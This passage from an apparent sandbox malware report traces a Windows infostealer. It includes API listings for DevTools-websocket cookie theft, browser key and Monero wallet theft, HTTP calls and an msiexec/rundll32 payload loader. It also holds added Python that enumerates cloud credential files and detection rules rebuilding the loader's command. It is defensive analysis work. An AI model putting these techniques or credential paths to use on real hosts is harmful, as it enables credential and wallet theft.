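    FindFirstFileA("*.*") / FindNextFileA walk; descending into
    sub-directories is assumed here, so this is a superset of a flat walk.
    """
    hits = []
    for base in map(Path, base_dirs):
        for label, folder in TARGET_FOLDERS.items():
            root = base / folder
            if not root.is_dir():
                continue
            for path in sorted(root.rglob("*")):
                if path.is_file():
                    hits.append((label, str(path.relative_to(base))))
    return hits


def summarize(hits):
    """Count hits per loot label, the shape a triage note would report."""
    counts = {}
    for label, _ in hits:
        counts[label] = counts.get(label, 0) + 1
    return counts


def build_sample_profile():
    """Constructed profile tree with placeholder contents (no real secrets)."""
    base = Path(tempfile.mkdtemp(prefix="cred_audit_"))
    files = {
        ".aws/credentials": "[default]\naws_access_key_id = PLACEHOLDER\n",
        ".aws/config": "[default]\nregion = eu-west-1\n",
        ".azure/msal_token_cache.json": "{}",
        ".azure/azureProfile.json": "{}",
        ".IdentityService/msal.cache": "placeholder",
        "Documents/notes.txt": "not a credential store",
    }
    for rel, body in files.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return base


if __name__ == "__main__":
    profile = build_sample_profile()
    found = find_cloud_credential_files([profile])
    for label, rel in found:
        print(f"{label:24} {rel}")
    print(summarize(found))
```

Run it against a real profile by passing the two base directories instead of the constructed one; every file it lists is one the sample would have copied and should be treated as exposed (rotate AWS keys, revoke Azure refresh tokens) if the host executed this sample.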
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F491FC (hGlobal NULL, fDeleteOnRelease TRUE: an in-memory IStream, paired below with the image/jpeg encoder string)
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: ca0b6314e05d1be336047ba525c899c6d86be3e84ca4dc7d16ca943b7148a481
                            • Instruction ID: 9a3087f8b4975ce83e5c765d342be35ae51b0ed673f404707a17326d10f4339a
                            • Opcode Fuzzy Hash: ca0b6314e05d1be336047ba525c899c6d86be3e84ca4dc7d16ca943b7148a481
                            • Instruction Fuzzy Hash: 0871C075A10208AFDB14DFE4EC89FEEBB79BF48700F108608F556A7285DB74A904DB60
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F43415 (0x3C = sizeof(SHELLEXECUTEINFOA), the cbSize field; same for the two calls below)
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F435AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00F4373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: a30cec8c09ddc2ffaf22b2c70feb2489647ac618256de3b5faac8748c6661bec
                            • Instruction ID: e68a05396bbc2229f7bffbfc6142146455725eb991dfa8f5a3734910e3815014
                            • Opcode Fuzzy Hash: a30cec8c09ddc2ffaf22b2c70feb2489647ac618256de3b5faac8748c6661bec
                            • Instruction Fuzzy Hash: 65124F719401189BEB15FBA0DDA2FEDBB39EF54300F004199F90666192EF386B49DF62
                            APIs
                              • Part of subcall function 00F39A50: InternetOpenA.WININET(00F50AF6,00000001,00000000,00000000,00000000), ref: 00F39A6A (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT)
                            • lstrcat.KERNEL32(?,cookies), ref: 00F39CAF
                            • lstrcat.KERNEL32(?,00F512C4), ref: 00F39CC1
                            • lstrcat.KERNEL32(?,?), ref: 00F39CD5
                            • lstrcat.KERNEL32(?,00F512C8), ref: 00F39CE7
                            • lstrcat.KERNEL32(?,?), ref: 00F39CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 00F39D0D
                            • lstrlen.KERNEL32(00000000), ref: 00F39D17
                            • lstrlen.KERNEL32(00000000), ref: 00F39D26
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: 3aa0b251e6b5a75aa433def5cc985051b08bf0742968c59efc27990bae1ff5ea
                            • Instruction ID: f984ffdef7fc9cd03c36a8651b7bb8250aaceffc167971d8bb8037cab59e0a43
                            • Opcode Fuzzy Hash: 3aa0b251e6b5a75aa433def5cc985051b08bf0742968c59efc27990bae1ff5ea
                            • Instruction Fuzzy Hash: E75154B1C10608ABDB14EBE0DC99FEE7738AF14311F404658F60AA7085EF74AA49DF61
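Two of the listings above leave a host-level trace worth a rule: the loader (three ShellExecuteEx calls with the C:\Windows\system32\msiexec.exe, /i ", /passive, .msi, .dll and C:\Windows\system32\rundll32.exe fragments) and the cookie routine that talks to ws://localhost:9229 under /devtools and writes a cookies...txt file. The Python below is an added detection example, not code from the report or from the sample: it reconstructs the launch command the loader builds per payload extension (the argument order is assumed from the fragments, which the listing shows only as separate strings) and runs two process-creation rules and one network rule over constructed Sysmon-style events. The rule names, the user-writable-path heuristic, the victim paths and the event values are assumptions for illustration; the localhost port is the one hard-coded in the sample's strings.

```python
"""Added detection example for the loader and devtools-cookie listings."""
import ntpath
import re

# Literal fragments visible in the listings' String ID fields.
MSIEXEC = r"C:\Windows\system32\msiexec.exe"
RUNDLL32 = r"C:\Windows\system32\rundll32.exe"
DEVTOOLS_PORT = 9229          # from "ws://localhost:9229"

# ASSUMPTION: heuristic for "dropped payload" locations; tune per estate.
USER_WRITABLE = re.compile(
    r"^(?:[A-Z]:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\"
    r"|[A-Z]:\\ProgramData\\|[A-Z]:\\Windows\\Temp\\)",
    re.IGNORECASE,
)


def reconstruct_launch(payload_path):
    """(image, arguments) the loader hands to ShellExecuteEx for a payload.

    ASSUMPTION: the order in which the sample glues the fragments
    '/i "', ' /passive' and '"" ' together; the listing shows the pieces only.
    Anything that is neither .msi nor .dll is launched directly.
    """
    ext = ntpath.splitext(payload_path)[1].lower()
    if ext == ".msi":
        return MSIEXEC, f'/i "{payload_path}" /passive'
    if ext == ".dll":
        return RUNDLL32, f'"{payload_path}"'
    return payload_path, ""


def _argv(command_line):
    """Quoted and unquoted tokens of a command line (paths with spaces stay whole)."""
    return re.findall(r'"([^"]+)"', command_line) + command_line.split()


def match_event(ev):
    """Rule names that fire for one Sysmon-style event dict."""
    hits = []
    if ev.get("EventType") == "ProcessCreate":
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        args = _argv(cmd)
        # Rule 1: passive MSI install of a package sitting in a user-writable dir.
        if (image.endswith("\\msiexec.exe")
                and re.search(r"(?:^|\s)/i(?:\s|$)", cmd, re.IGNORECASE)
                and "/passive" in cmd.lower()
                and any(USER_WRITABLE.match(a) for a in args)):
            hits.append("msiexec_passive_install_from_user_dir")
        # Rule 2: rundll32 loading a DLL from a user-writable dir.
        if image.endswith("\\rundll32.exe") and any(
                re.search(r"\.dll\b", a, re.IGNORECASE) and USER_WRITABLE.match(a)
                for a in args):
            hits.append("rundll32_dll_from_user_dir")
    elif ev.get("EventType") == "NetworkConnect":
        # Rule 3: anything dialling the DevTools port on loopback.
        if (ev.get("DestinationIp") in ("127.0.0.1", "::1")
                and int(ev.get("DestinationPort", 0)) == DEVTOOLS_PORT):
            hits.append("local_devtools_websocket")
    return hits


def scan(events):
    """Rule hits per event, index-aligned with the input."""
    return [match_event(ev) for ev in events]


# Constructed events (Sysmon event 1 / event 3 field names); values are made up.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": MSIEXEC,
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": MSIEXEC + ' /i "C:\\Users\\victim\\AppData\\Local\\Temp\\update.msi" /passive'},
    {"EventType": "ProcessCreate", "Image": RUNDLL32,
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": RUNDLL32 + ' "C:\\Users\\victim\\AppData\\Roaming\\mod.dll"'},
    {"EventType": "ProcessCreate", "Image": MSIEXEC,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Program Files\\Vendor\\setup.msi"'},
    {"EventType": "NetworkConnect",
     "Image": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": "9229"},
    {"EventType": "NetworkConnect",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{ev['EventType']:14} {ev['Image']:60} {hits}")
```

The third event shows the tuning point: an installer launched from Program Files without /passive stays quiet, while the same msiexec with a package in %LOCALAPPDATA%\Temp and /passive fires. The loopback rule is deliberately process-agnostic, because the sample connects to the port itself; if a developer population legitimately uses remote debugging, filter on the connecting image rather than dropping the rule.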
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F362D0: InternetOpenA.WININET(00F50DFF,00000001,00000000,00000000,00000000), ref: 00F36331 (dwAccessType 1 = INTERNET_OPEN_TYPE_DIRECT)
                              • Part of subcall function 00F362D0: StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36353
                              • Part of subcall function 00F362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F36385 (dwService 3 = INTERNET_SERVICE_HTTP)
                              • Part of subcall function 00F362D0: HttpOpenRequestA.WININET(00000000,GET,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F363D5 (dwFlags 0x00400100 = INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE)
                              • Part of subcall function 00F362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F3640F (dwOption 0x1F = INTERNET_OPTION_SECURITY_FLAGS, a 4-byte DWORD set on the request handle before it is sent)
                              • Part of subcall function 00F362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F36421
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F45568
                            • lstrlen.KERNEL32(00000000), ref: 00F4557F
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2 (uFlags 0x40 = LPTR, i.e. LMEM_FIXED | LMEM_ZEROINIT)
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00F455B4
                            • lstrlen.KERNEL32(00000000), ref: 00F455D3
                            • lstrlen.KERNEL32(00000000), ref: 00F455FE
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 98f4f14a44b8ef28ecd399ee8b68b967b93658cb22cab9bc47fde9adc3c748a6
                            • Instruction ID: 263536b0ba4954c9b3ccb8198aba7f2588d16453b6effbf781dd16b7868117aa
                            • Opcode Fuzzy Hash: 98f4f14a44b8ef28ecd399ee8b68b967b93658cb22cab9bc47fde9adc3c748a6
                            • Instruction Fuzzy Hash: 16513C30950508DBEB14FF60CDA6AED7B39AF50385F504458FD0A57592EF38AB08EB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 30cc2d6e7f18c792a8486da2cdcf75d616050bdf7e9b760d0a19bb128664428b
                            • Instruction ID: 1ae223669a93eef1338a86d74bdc89f243c661fbd4eda1f8d92a13bbb21fcd07
                            • Opcode Fuzzy Hash: 30cc2d6e7f18c792a8486da2cdcf75d616050bdf7e9b760d0a19bb128664428b
                            • Instruction Fuzzy Hash: A5C1C4B5D40219ABCB14EF60DC99FEE7778BF54304F004598F90967242EA74EA85DF90
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F4453C
                            • lstrcat.KERNEL32(?,0098DF38), ref: 00F4455B
                            • lstrcat.KERNEL32(?,?), ref: 00F4456F
                            • lstrcat.KERNEL32(?,0098CDC0), ref: 00F44583
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F48F20: GetFileAttributesA.KERNEL32(00000000,?,00F31B94,?,?,00F5577C,?,?,00F50E22), ref: 00F48F2F
                              • Part of subcall function 00F3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F3A489
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                              • Part of subcall function 00F49550: GlobalAlloc.KERNEL32(00000000,00F4462D,00F4462D), ref: 00F49563
                            • StrStrA.SHLWAPI(?,0098DF68), ref: 00F44643
                            • GlobalFree.KERNEL32(?), ref: 00F44762
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                              • Part of subcall function 00F3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                              • Part of subcall function 00F3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                              • Part of subcall function 00F3A210: LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                            • lstrcat.KERNEL32(?,00000000), ref: 00F446F3
                            • StrCmpCA.SHLWAPI(?,00F508D2), ref: 00F44710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F44722
                            • lstrcat.KERNEL32(00000000,?), ref: 00F44735
                            • lstrcat.KERNEL32(00000000,00F50FA0), ref: 00F44744
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: e96e1b492c8ff63efedc95ea435963d7ce6cb5960180853e2040082b88c1936c
                            • Instruction ID: 087c65a454e4d828d5540a66448966b3bfc79a19189c45564fa932a13a506917
                            • Opcode Fuzzy Hash: e96e1b492c8ff63efedc95ea435963d7ce6cb5960180853e2040082b88c1936c
                            • Instruction Fuzzy Hash: CD7179B6900208ABDB14EBB0DD59FDE777DAB88300F004698F605A7185EB38EB49DF51
                            APIs
                              • Part of subcall function 00F312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F312B4
                              • Part of subcall function 00F312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F312BB
                              • Part of subcall function 00F312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F312D7
                              • Part of subcall function 00F312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F312F5
                              • Part of subcall function 00F312A0: RegCloseKey.ADVAPI32(?), ref: 00F312FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3134F
                            • lstrlen.KERNEL32(?), ref: 00F3135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00F31377
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F31465
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 00F314EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
